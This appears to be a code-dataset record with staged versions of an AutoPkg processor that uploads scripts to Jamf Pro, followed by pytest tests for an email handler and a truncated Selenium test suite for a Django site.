script_json)\n if self.status_check(r, 'Script', script_name, request) == 'break':\n break\n if count > 5:\n self.output('Script upload did not succeed after 5 attempts')\n self.output('\\nHTTP POST Response Code: {}'.format(r.\n status_code))\n raise ProcessorError('ERROR: Script upload failed ')\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get('JSS_URL')\n self.jamf_user = self.env.get('API_USERNAME')\n self.jamf_password = self.env.get('API_PASSWORD')\n self.script_path = self.env.get('script_path')\n self.script_name = self.env.get('script_name')\n self.script_category = self.env.get('script_category')\n self.script_priority = self.env.get('script_priority')\n self.osrequirements = self.env.get('osrequirements')\n self.script_info = self.env.get('script_info')\n self.script_notes = self.env.get('script_notes')\n self.script_parameter4 = self.env.get('script_parameter4')\n self.script_parameter5 = self.env.get('script_parameter5')\n self.script_parameter6 = self.env.get('script_parameter6')\n self.script_parameter7 = self.env.get('script_parameter7')\n self.script_parameter8 = self.env.get('script_parameter8')\n self.script_parameter9 = self.env.get('script_parameter9')\n self.script_parameter10 = self.env.get('script_parameter10')\n self.script_parameter11 = self.env.get('script_parameter11')\n self.replace = self.env.get('replace_script')\n self.sleep = self.env.get('sleep')\n if not self.replace or self.replace == 'False':\n self.replace = False\n if 'jamfscriptuploader_summary_result' in self.env:\n del self.env['jamfscriptuploader_summary_result']\n script_uploaded = False\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.\n jamf_password)\n if self.script_category:\n self.output('Checking categories for {}'.format(self.\n script_category))\n obj_type = 'category'\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(self.jamf_url,\n obj_type, obj_name, token)\n if not category_id:\n self.output('WARNING: Category not found!')\n category_id = '-1'\n else:\n self.output('Category {} found: ID={}'.format(self.\n script_category, category_id))\n else:\n self.script_category = ''\n category_id = '-1'\n if not self.script_path.startswith('/'):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(\n f'ERROR: Script file {self.script_path} not found')\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n self.output(\"Checking for existing '{}' on {}\".format(self.\n script_name, self.jamf_url))\n self.output('Full path: {}'.format(self.script_path), verbose_level=2)\n obj_type = 'script'\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,\n obj_name, token)\n if obj_id:\n self.output(\"Script '{}' already exists: ID {}\".format(self.\n script_name, obj_id))\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\"\n .format(self.replace), verbose_level=1)\n else:\n self.output(\n \"Not replacing existing script. Use replace_script='True' to enforce.\"\n , verbose_level=1)\n return\n self.upload_script(self.jamf_url, self.script_name, self.\n script_path, category_id, self.script_category, self.\n script_info, self.script_notes, self.script_priority, self.\n script_parameter4, self.script_parameter5, self.\n script_parameter6, self.script_parameter7, self.\n script_parameter8, self.script_parameter9, self.\n script_parameter10, self.script_parameter11, self.\n osrequirements, token, obj_id)\n script_uploaded = True\n self.env['script_name'] = self.script_name\n self.env['script_uploaded'] = script_uploaded\n if script_uploaded:\n self.env['jamfscriptuploader_summary_result'] = {'summary_text':\n 'The following scripts were created or updated in Jamf Pro:',\n 'report_fields': ['script', 'path', 'category', 'priority',\n 'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',\n 'P9', 'P10', 'P11'], 'data': {'script': self.script_name,\n 'path': self.script_path, 'category': self.script_category,\n 'priority': str(self.script_priority), 'info': self.\n script_info, 'os_req': self.osrequirements, 'notes': self.\n script_notes, 'P4': self.script_parameter4, 'P5': self.\n script_parameter5, 'P6': self.script_parameter6, 'P7': self\n .script_parameter7, 'P8': self.script_parameter8, 'P9':\n self.script_parameter9, 'P10': self.script_parameter10,\n 'P11': self.script_parameter11}}\n\n\nif __name__ == '__main__':\n PROCESSOR = JamfScriptUploader()\n PROCESSOR.execute_shell()\n",
"step-5": "#!/usr/local/autopkg/python\n\n\"\"\"\nJamfScriptUploader processor for uploading items to Jamf Pro using AutoPkg\n by G Pugh\n\"\"\"\n\nimport os.path\nimport sys\n\nfrom time import sleep\nfrom autopkglib import ProcessorError # pylint: disable=import-error\n\n# to use a base module in AutoPkg we need to add this path to the sys.path.\n# this violates flake8 E402 (PEP8 imports) but is unavoidable, so the following\n# imports require noqa comments for E402\nsys.path.insert(0, os.path.dirname(__file__))\n\nfrom JamfUploaderLib.JamfUploaderBase import JamfUploaderBase # noqa: E402\n\n__all__ = [\"JamfScriptUploader\"]\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n \"A processor for AutoPkg that will upload a script to a Jamf Cloud or \"\n \"on-prem server.\"\n )\n input_variables = {\n \"JSS_URL\": {\n \"required\": True,\n \"description\": \"URL to a Jamf Pro server that the API user has write access \"\n \"to, optionally set as a key in the com.github.autopkg \"\n \"preference file.\",\n },\n \"API_USERNAME\": {\n \"required\": True,\n \"description\": \"Username of account with appropriate access to \"\n \"jss, optionally set as a key in the com.github.autopkg \"\n \"preference file.\",\n },\n \"API_PASSWORD\": {\n \"required\": True,\n \"description\": \"Password of api user, optionally set as a key in \"\n \"the com.github.autopkg preference file.\",\n },\n \"script_path\": {\n \"required\": False,\n \"description\": \"Full path to the script to be uploaded\",\n },\n \"script_name\": {\n \"required\": False,\n \"description\": \"Name of the script in Jamf\",\n },\n \"script_category\": {\n \"required\": False,\n \"description\": \"Script category\",\n \"default\": \"\",\n },\n \"script_priority\": {\n \"required\": False,\n \"description\": \"Script priority (BEFORE or AFTER)\",\n \"default\": \"AFTER\",\n },\n \"osrequirements\": {\n \"required\": False,\n \"description\": \"Script OS requirements\",\n \"default\": \"\",\n },\n \"script_info\": {\n \"required\": False,\n \"description\": \"Script info field\",\n \"default\": \"\",\n },\n \"script_notes\": {\n \"required\": False,\n \"description\": \"Script notes field\",\n \"default\": \"\",\n },\n \"script_parameter4\": {\n \"required\": False,\n \"description\": \"Script parameter 4 title\",\n \"default\": \"\",\n },\n \"script_parameter5\": {\n \"required\": False,\n \"description\": \"Script parameter 5 title\",\n \"default\": \"\",\n },\n \"script_parameter6\": {\n \"required\": False,\n \"description\": \"Script parameter 6 title\",\n \"default\": \"\",\n },\n \"script_parameter7\": {\n \"required\": False,\n \"description\": \"Script parameter 7 title\",\n \"default\": \"\",\n },\n \"script_parameter8\": {\n \"required\": False,\n \"description\": \"Script parameter 8 title\",\n \"default\": \"\",\n },\n \"script_parameter9\": {\n \"required\": False,\n \"description\": \"Script parameter 9 title\",\n \"default\": \"\",\n },\n \"script_parameter10\": {\n \"required\": False,\n \"description\": \"Script parameter 10 title\",\n \"default\": \"\",\n },\n \"script_parameter11\": {\n \"required\": False,\n \"description\": \"Script parameter 11 title\",\n \"default\": \"\",\n },\n \"replace_script\": {\n \"required\": False,\n \"description\": \"Overwrite an existing script if True.\",\n \"default\": False,\n },\n \"sleep\": {\n \"required\": False,\n \"description\": \"Pause after running this processor for specified seconds.\",\n \"default\": \"0\",\n },\n }\n\n output_variables = {\n \"script_name\": {\n \"required\": False,\n \"description\": \"Name of the uploaded script\",\n },\n \"jamfscriptuploader_summary_result\": {\n \"description\": \"Description of interesting results.\",\n },\n }\n\n def upload_script(\n self,\n jamf_url,\n script_name,\n script_path,\n category_id,\n script_category,\n script_info,\n script_notes,\n script_priority,\n script_parameter4,\n script_parameter5,\n script_parameter6,\n script_parameter7,\n script_parameter8,\n script_parameter9,\n script_parameter10,\n script_parameter11,\n script_os_requirements,\n token,\n obj_id=0,\n ):\n \"\"\"Update script metadata.\"\"\"\n\n # import script from file and replace any keys in the script\n if os.path.exists(script_path):\n with open(script_path, \"r\") as file:\n script_contents = file.read()\n else:\n raise ProcessorError(\"Script does not exist!\")\n\n # substitute user-assignable keys\n script_contents = self.substitute_assignable_keys(script_contents)\n\n # priority has to be in upper case. Let's make it nice for the user\n if script_priority:\n script_priority = script_priority.upper()\n\n # build the object\n script_data = {\n \"name\": script_name,\n \"info\": script_info,\n \"notes\": script_notes,\n \"priority\": script_priority,\n \"categoryId\": category_id,\n \"categoryName\": script_category,\n \"parameter4\": script_parameter4,\n \"parameter5\": script_parameter5,\n \"parameter6\": script_parameter6,\n \"parameter7\": script_parameter7,\n \"parameter8\": script_parameter8,\n \"parameter9\": script_parameter9,\n \"parameter10\": script_parameter10,\n \"parameter11\": script_parameter11,\n \"osRequirements\": script_os_requirements,\n \"scriptContents\": script_contents,\n }\n\n self.output(\n \"Script data:\",\n verbose_level=2,\n )\n self.output(\n script_data,\n verbose_level=2,\n )\n\n script_json = self.write_json_file(script_data)\n\n self.output(\"Uploading script..\")\n\n # if we find an object ID we put, if not, we post\n object_type = \"script\"\n if obj_id:\n url = \"{}/{}/{}\".format(jamf_url, self.api_endpoints(object_type), obj_id)\n else:\n url = \"{}/{}\".format(jamf_url, self.api_endpoints(object_type))\n\n count = 0\n while True:\n count += 1\n self.output(\n \"Script upload attempt {}\".format(count),\n verbose_level=2,\n )\n request = \"PUT\" if obj_id else \"POST\"\n r = self.curl(request=request, url=url, token=token, data=script_json)\n # check HTTP response\n if self.status_check(r, \"Script\", script_name, request) == \"break\":\n break\n if count > 5:\n self.output(\"Script upload did not succeed after 5 attempts\")\n self.output(\"\\nHTTP POST Response Code: {}\".format(r.status_code))\n raise ProcessorError(\"ERROR: Script upload failed \")\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get(\"JSS_URL\")\n self.jamf_user = self.env.get(\"API_USERNAME\")\n self.jamf_password = self.env.get(\"API_PASSWORD\")\n self.script_path = self.env.get(\"script_path\")\n self.script_name = self.env.get(\"script_name\")\n self.script_category = self.env.get(\"script_category\")\n self.script_priority = self.env.get(\"script_priority\")\n self.osrequirements = self.env.get(\"osrequirements\")\n self.script_info = self.env.get(\"script_info\")\n self.script_notes = self.env.get(\"script_notes\")\n self.script_parameter4 = self.env.get(\"script_parameter4\")\n self.script_parameter5 = self.env.get(\"script_parameter5\")\n self.script_parameter6 = self.env.get(\"script_parameter6\")\n self.script_parameter7 = self.env.get(\"script_parameter7\")\n self.script_parameter8 = self.env.get(\"script_parameter8\")\n self.script_parameter9 = self.env.get(\"script_parameter9\")\n self.script_parameter10 = self.env.get(\"script_parameter10\")\n self.script_parameter11 = self.env.get(\"script_parameter11\")\n self.replace = self.env.get(\"replace_script\")\n self.sleep = self.env.get(\"sleep\")\n # handle setting replace in overrides\n if not self.replace or self.replace == \"False\":\n self.replace = False\n\n # clear any pre-existing summary result\n if \"jamfscriptuploader_summary_result\" in self.env:\n del self.env[\"jamfscriptuploader_summary_result\"]\n script_uploaded = False\n\n # obtain the relevant credentials\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.jamf_password)\n\n # get the id for a category if supplied\n if self.script_category:\n self.output(\"Checking categories for {}\".format(self.script_category))\n\n # check for existing category - requires obj_name\n obj_type = \"category\"\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(\n self.jamf_url,\n obj_type,\n obj_name,\n token,\n )\n\n if not category_id:\n self.output(\"WARNING: Category not found!\")\n category_id = \"-1\"\n else:\n self.output(\n \"Category {} found: ID={}\".format(self.script_category, category_id)\n )\n else:\n self.script_category = \"\"\n category_id = \"-1\"\n\n # handle files with a relative path\n if not self.script_path.startswith(\"/\"):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(f\"ERROR: Script file {self.script_path} not found\")\n\n # now start the process of uploading the object\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n\n # check for existing script\n self.output(\n \"Checking for existing '{}' on {}\".format(self.script_name, self.jamf_url)\n )\n self.output(\n \"Full path: {}\".format(self.script_path),\n verbose_level=2,\n )\n obj_type = \"script\"\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(\n self.jamf_url,\n obj_type,\n obj_name,\n token,\n )\n\n if obj_id:\n self.output(\n \"Script '{}' already exists: ID {}\".format(self.script_name, obj_id)\n )\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\".format(\n self.replace\n ),\n verbose_level=1,\n )\n else:\n self.output(\n \"Not replacing existing script. Use replace_script='True' to enforce.\",\n verbose_level=1,\n )\n return\n\n # post the script\n self.upload_script(\n self.jamf_url,\n self.script_name,\n self.script_path,\n category_id,\n self.script_category,\n self.script_info,\n self.script_notes,\n self.script_priority,\n self.script_parameter4,\n self.script_parameter5,\n self.script_parameter6,\n self.script_parameter7,\n self.script_parameter8,\n self.script_parameter9,\n self.script_parameter10,\n self.script_parameter11,\n self.osrequirements,\n token,\n obj_id,\n )\n script_uploaded = True\n\n # output the summary\n self.env[\"script_name\"] = self.script_name\n self.env[\"script_uploaded\"] = script_uploaded\n if script_uploaded:\n self.env[\"jamfscriptuploader_summary_result\"] = {\n \"summary_text\": \"The following scripts were created or updated in Jamf Pro:\",\n \"report_fields\": [\n \"script\",\n \"path\",\n \"category\",\n \"priority\",\n \"os_req\",\n \"info\",\n \"notes\",\n \"P4\",\n \"P5\",\n \"P6\",\n \"P7\",\n \"P8\",\n \"P9\",\n \"P10\",\n \"P11\",\n ],\n \"data\": {\n \"script\": self.script_name,\n \"path\": self.script_path,\n \"category\": self.script_category,\n \"priority\": str(self.script_priority),\n \"info\": self.script_info,\n \"os_req\": self.osrequirements,\n \"notes\": self.script_notes,\n \"P4\": self.script_parameter4,\n \"P5\": self.script_parameter5,\n \"P6\": self.script_parameter6,\n \"P7\": self.script_parameter7,\n \"P8\": self.script_parameter8,\n \"P9\": self.script_parameter9,\n \"P10\": self.script_parameter10,\n \"P11\": self.script_parameter11,\n },\n }\n\n\nif __name__ == \"__main__\":\n PROCESSOR = JamfScriptUploader()\n PROCESSOR.execute_shell()\n",
"step-ids": [
1,
4,
5,
7,
8
]
}
|
[
1,
4,
5,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_send_requirements(config):
handler = EmailHandler(config)
with pytest.raises(InsuficientInformation):
handler.publish({})
with pytest.raises(InsuficientInformation):
handler.publish({'recipient': 'charpe@mailinator.com'})
with pytest.raises(InsuficientInformation):
handler.publish({'recipient': 'charpe@mailinator.com', 'subject':
'The subject'})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_send_requirements(config):
handler = EmailHandler(config)
with pytest.raises(InsuficientInformation):
handler.publish({})
with pytest.raises(InsuficientInformation):
handler.publish({'recipient': 'charpe@mailinator.com'})
with pytest.raises(InsuficientInformation):
handler.publish({'recipient': 'charpe@mailinator.com', 'subject':
'The subject'})
def test_send(config, caplog, mocker):
the_mock = MagicMock()
smoke = MagicMock(return_value=the_mock)
mocker.patch('smtplib.SMTP', new=smoke)
handler = EmailHandler(config)
handler.publish({'recipient': 'charpe@mailinator.com', 'subject':
'The subject', 'data': {'content': 'El mensaje'}})
the_mock.send_message.assert_called_once()
msg = the_mock.send_message.call_args[0][0]
assert msg.get('From') == config['MAIL_DEFAULT_SENDER']
assert msg.get('To') == 'charpe@mailinator.com'
html, text = msg.get_payload()
assert 'El mensaje' in text.get_payload()
assert '<p>El mensaje</p>' in html.get_payload()
the_mock.quit.assert_called_once()
<|reserved_special_token_1|>
from unittest.mock import MagicMock
import pytest
from charpe.mediums.email_handler import EmailHandler
from charpe.errors import InsuficientInformation
def test_send_requirements(config):
handler = EmailHandler(config)
with pytest.raises(InsuficientInformation):
handler.publish({})
with pytest.raises(InsuficientInformation):
handler.publish({'recipient': 'charpe@mailinator.com'})
with pytest.raises(InsuficientInformation):
handler.publish({'recipient': 'charpe@mailinator.com', 'subject':
'The subject'})
def test_send(config, caplog, mocker):
the_mock = MagicMock()
smoke = MagicMock(return_value=the_mock)
mocker.patch('smtplib.SMTP', new=smoke)
handler = EmailHandler(config)
handler.publish({'recipient': 'charpe@mailinator.com', 'subject':
'The subject', 'data': {'content': 'El mensaje'}})
the_mock.send_message.assert_called_once()
msg = the_mock.send_message.call_args[0][0]
assert msg.get('From') == config['MAIL_DEFAULT_SENDER']
assert msg.get('To') == 'charpe@mailinator.com'
html, text = msg.get_payload()
assert 'El mensaje' in text.get_payload()
assert '<p>El mensaje</p>' in html.get_payload()
the_mock.quit.assert_called_once()
<|reserved_special_token_1|>
from unittest.mock import MagicMock
import pytest
from charpe.mediums.email_handler import EmailHandler
from charpe.errors import InsuficientInformation
def test_send_requirements(config):
handler = EmailHandler(config)
with pytest.raises(InsuficientInformation):
handler.publish({})
with pytest.raises(InsuficientInformation):
handler.publish({
'recipient': 'charpe@mailinator.com',
})
with pytest.raises(InsuficientInformation):
handler.publish({
'recipient': 'charpe@mailinator.com',
'subject': 'The subject',
})
def test_send(config, caplog, mocker):
the_mock = MagicMock()
smoke = MagicMock(return_value=the_mock)
mocker.patch('smtplib.SMTP', new=smoke)
handler = EmailHandler(config)
handler.publish({
'recipient': 'charpe@mailinator.com',
'subject': 'The subject',
'data': {
'content': 'El mensaje',
},
})
the_mock.send_message.assert_called_once()
msg = the_mock.send_message.call_args[0][0]
assert msg.get('From') == config['MAIL_DEFAULT_SENDER']
assert msg.get('To') == 'charpe@mailinator.com'
html, text = msg.get_payload()
assert 'El mensaje' in text.get_payload()
assert '<p>El mensaje</p>' in html.get_payload()
the_mock.quit.assert_called_once()
|
flexible
|
{
"blob_id": "e2d8a1e13a4162cd606eec12530451ab230c95b6",
"index": 3103,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com'})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject'})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com'})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject'})\n\n\ndef test_send(config, caplog, mocker):\n the_mock = MagicMock()\n smoke = MagicMock(return_value=the_mock)\n mocker.patch('smtplib.SMTP', new=smoke)\n handler = EmailHandler(config)\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject', 'data': {'content': 'El mensaje'}})\n the_mock.send_message.assert_called_once()\n msg = the_mock.send_message.call_args[0][0]\n assert msg.get('From') == config['MAIL_DEFAULT_SENDER']\n assert msg.get('To') == 'charpe@mailinator.com'\n html, text = msg.get_payload()\n assert 'El mensaje' in text.get_payload()\n assert '<p>El mensaje</p>' in html.get_payload()\n the_mock.quit.assert_called_once()\n",
"step-4": "from unittest.mock import MagicMock\nimport pytest\nfrom charpe.mediums.email_handler import EmailHandler\nfrom charpe.errors import InsuficientInformation\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com'})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject'})\n\n\ndef test_send(config, caplog, mocker):\n the_mock = MagicMock()\n smoke = MagicMock(return_value=the_mock)\n mocker.patch('smtplib.SMTP', new=smoke)\n handler = EmailHandler(config)\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject', 'data': {'content': 'El mensaje'}})\n the_mock.send_message.assert_called_once()\n msg = the_mock.send_message.call_args[0][0]\n assert msg.get('From') == config['MAIL_DEFAULT_SENDER']\n assert msg.get('To') == 'charpe@mailinator.com'\n html, text = msg.get_payload()\n assert 'El mensaje' in text.get_payload()\n assert '<p>El mensaje</p>' in html.get_payload()\n the_mock.quit.assert_called_once()\n",
"step-5": "from unittest.mock import MagicMock\nimport pytest\n\nfrom charpe.mediums.email_handler import EmailHandler\nfrom charpe.errors import InsuficientInformation\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n\n with pytest.raises(InsuficientInformation):\n handler.publish({\n 'recipient': 'charpe@mailinator.com',\n })\n\n with pytest.raises(InsuficientInformation):\n handler.publish({\n 'recipient': 'charpe@mailinator.com',\n 'subject': 'The subject',\n })\n\n\ndef test_send(config, caplog, mocker):\n the_mock = MagicMock()\n smoke = MagicMock(return_value=the_mock)\n mocker.patch('smtplib.SMTP', new=smoke)\n\n handler = EmailHandler(config)\n\n handler.publish({\n 'recipient': 'charpe@mailinator.com',\n 'subject': 'The subject',\n 'data': {\n 'content': 'El mensaje',\n },\n })\n\n the_mock.send_message.assert_called_once()\n msg = the_mock.send_message.call_args[0][0]\n\n assert msg.get('From') == config['MAIL_DEFAULT_SENDER']\n assert msg.get('To') == 'charpe@mailinator.com'\n\n html, text = msg.get_payload()\n\n assert 'El mensaje' in text.get_payload()\n assert '<p>El mensaje</p>' in html.get_payload()\n\n the_mock.quit.assert_called_once()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
def test_title(self):
self.browser.get('http://localhost:8000')
self.assertIn('BuscoAyuda', self.browser.title)
<|reserved_special_token_0|>
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
<|reserved_special_token_0|>
def test_Editar(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
claveIngreso = self.browser.find_element_by_id('password')
claveIngreso.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
linkEditar = self.browser.find_element_by_id('id_editar')
linkEditar.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.clear()
nombre.send_keys('Betzy Editado')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.clear()
apellidos.send_keys('Montanez Editado')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.clear()
experiencia.send_keys('10')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']"
).click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.clear()
telefono.send_keys('313555666')
correo = self.browser.find_element_by_id('id_correo')
correo.clear()
correo.send_keys('ba.montanez01@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\\chromedriver\\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.clear()
nombreUsuario.send_keys('ba.montanez2')
clave = self.browser.find_element_by_id('id_password')
clave.clear()
clave.send_keys('prueba1234')
botonGrabar = self.browser.find_element_by_id('id_editar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
__author__ = 'asistente'
from unittest import TestCase
from selenium import webdriver
from selenium.webdriver.common.by import By
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
def test_title(self):
self.browser.get('http://localhost:8000')
self.assertIn('BuscoAyuda', self.browser.title)
def test_registro(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_register')
link.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.send_keys('Rafael')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.send_keys('Medrano')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.send_keys('7')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']"
).click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.send_keys('3135555555')
correo = self.browser.find_element_by_id('id_correo')
correo.send_keys('re.medrano@uniandes.edu.co')
